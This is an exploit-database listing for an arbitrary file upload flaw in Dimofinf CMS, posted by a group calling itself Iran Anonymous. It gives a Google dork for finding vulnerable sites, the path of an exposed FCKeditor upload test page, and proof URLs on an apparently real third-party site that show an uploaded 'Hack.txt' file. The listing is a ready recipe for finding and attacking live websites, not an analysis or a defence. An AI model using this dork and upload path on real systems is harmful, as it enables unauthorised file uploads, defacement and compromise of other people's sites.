Dimofinf CMS Arbitrary File Upload

2017.12.25

iranonymous (IR)

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: intext:" Powered by Dimofinf "

======================================================
# Exploit Title: Arbi Arbitrary File Upload Vulnerability
# Google Dork: intext:" Powered by Dimofinf "
# Date: 2017-12-20
# Author: Iran Anonymous
# Tested on: Win 7, Linux

***************************************************

# exploit => /editor/filemanager/connectors/uploadtest.html

# Add exploit => http://www.site.com/editor/filemanager/connectors/uploadtest.html


***************************************************
# Proof : 

http://www.arbi.ws//FCKeditor/editor/filemanager/connectors/uploadtest.html

http://www.arbi.ws///userfiles/Hack.txt

===================================================== 
# Thanks to : ~~> MR.Khatar || Blackwolf_Iran ||Ormazd || Sh@d0w ||Hellish_PN (mamad khodesh) ||Rabinson || Danger BoY 
# Iranian Anonymous 
# Telegram Channel: https://t.me/irananonymous 
# Discovered By: Saman.Khan

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Dimofinf CMS Arbitrary File Upload

Dork: intext:" Powered by Dimofinf "

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.